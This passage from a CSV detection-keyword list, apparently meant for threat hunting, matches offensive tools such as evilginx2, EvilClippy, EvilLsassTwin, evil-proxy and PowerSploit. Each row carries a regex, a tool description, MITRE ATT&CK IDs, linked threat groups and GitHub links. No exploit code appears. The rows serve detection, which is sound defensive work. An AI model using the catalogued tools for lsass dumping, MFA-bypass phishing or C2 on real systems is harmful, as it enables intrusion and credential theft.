- T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43330"
"*eversinc33/1.6-C2*",".{0,1000}eversinc33\/1\.6\-C2.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","1","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","43331"
"*evilclippy *",".{0,1000}evilclippy\s.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43332"
"*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43333"
"*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43334"
"*EvilClippyManager.*",".{0,1000}EvilClippyManager\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43335"
"*EvilClippy-master*",".{0,1000}EvilClippy\-master.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43336"
"*EvilClippyMenu*",".{0,1000}EvilClippyMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43337"
"*evilfeed.go*",".{0,1000}evilfeed\.go.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43338"
"*evilginx -p *",".{0,1000}evilginx\s\-p\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43339"
"*evilginx -p*",".{0,1000}evilginx\s\-p.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43340"
"*evilginx*",".{0,1000}evilginx.{0,1000}","offensive_tool_keyword","evilginx2","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","7","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43341"
"*evilginx.exe*",".{0,1000}evilginx\.exe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43342"
"*evilginx_linux*",".{0,1000}evilginx_linux.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43343"
"*evilginx_windows_*",".{0,1000}evilginx_windows_.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43344"
"*evilginx2*",".{0,1000}evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43345"
"*evilginx2/releases/*",".{0,1000}evilginx2\/releases\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43346"
"*Evilginx2-Phishlets*",".{0,1000}Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","43347"
"*evilginx-linux*",".{0,1000}evilginx\-linux.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","#linux","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43348"
"*evilginx-mastery*",".{0,1000}evilginx\-mastery.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43349"
"*evilginx-v3*",".{0,1000}evilginx\-v3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43350"
"*evilgophish*",".{0,1000}evilgophish.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43351"
"*evilgrade*",".{0,1000}evilgrade.{0,1000}","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002  - ","N/A","N/A","Framework","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","10","1309","284","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z","43352"
"*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43353"
"*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43354"
"*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43355"
"*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43356"
"*evilmog/ntlmv1-multi*",".{0,1000}evilmog\/ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43357"
"*EvilnoVNC () *",".{0,1000}EvilnoVNC\s\(\)\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux #content","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43358"
"*EvilnoVNC by @JoelGMSec*",".{0,1000}EvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43359"
"*EvilnoVNC Server*",".{0,1000}EvilnoVNC\sServer.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43360"
"*evilnovnc.Dockerfile*",".{0,1000}evilnovnc\.Dockerfile.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43361"
"*EvilnoVNC/run.sh*",".{0,1000}EvilnoVNC\/run\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43362"
"*EvilnoVNC/tmp/*",".{0,1000}EvilnoVNC\/tmp\/.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43363"
"*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43364"
"*eviloffice.exe *",".{0,1000}eviloffice\.exe\s.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43365"
"*eviloffice.exe*",".{0,1000}eviloffice\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43366"
"*EvilPayload.ps1*",".{0,1000}EvilPayload\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43367"
"*evilpr0ton@protonmail.com*",".{0,1000}evilpr0ton\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43368"
"*evil-proxy.gemspec*",".{0,1000}evil\-proxy\.gemspec.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43369"
"*evil-proxy/agentproxy*",".{0,1000}evil\-proxy\/agentproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43370"
"*evil-proxy/httpproxy*",".{0,1000}evil\-proxy\/httpproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43371"
"*evil-proxy/selenium*",".{0,1000}evil\-proxy\/selenium.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43372"
"*evil-proxy/version*",".{0,1000}evil\-proxy\/version.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43373"
"*EvilProxy::HTTPProxyServer*",".{0,1000}EvilProxy\:\:HTTPProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43374"
"*EvilProxy::MITMProxyServer*",".{0,1000}EvilProxy\:\:MITMProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43375"
"*evil-proxy-0.1.0*",".{0,1000}evil\-proxy\-0\.1\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43376"
"*evil-proxy-0.2.0*",".{0,1000}evil\-proxy\-0\.2\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43377"
"*evil-proxy-master*",".{0,1000}evil\-proxy\-master.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","43378"
"*evilqr-main*",".{0,1000}evilqr\-main.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43379"
"*evilqr-phishing*",".{0,1000}evilqr\-phishing.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43380"
"*evilqr-server*",".{0,1000}evilqr\-server.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","43381"
"*evilrdp.exe*",".{0,1000}evilrdp\.exe.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43382"
"*evilrdp-main*",".{0,1000}evilrdp\-main.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43383"
"*EvilSln-main*",".{0,1000}EvilSln\-main.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","43384"
"*evilsocket/legba*",".{0,1000}evilsocket\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","43385"
"*evilsocket@gmail.com*",".{0,1000}evilsocket\@gmail\.com.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","0","1","#email","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","43386"
"*eviltree_x64.exe*",".{0,1000}eviltree_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","43387"
"*EvilTwin.bin*",".{0,1000}EvilTwin\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43388"
"*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43389"
"*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43390"
"*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43391"
"*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43392"
"*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43393"
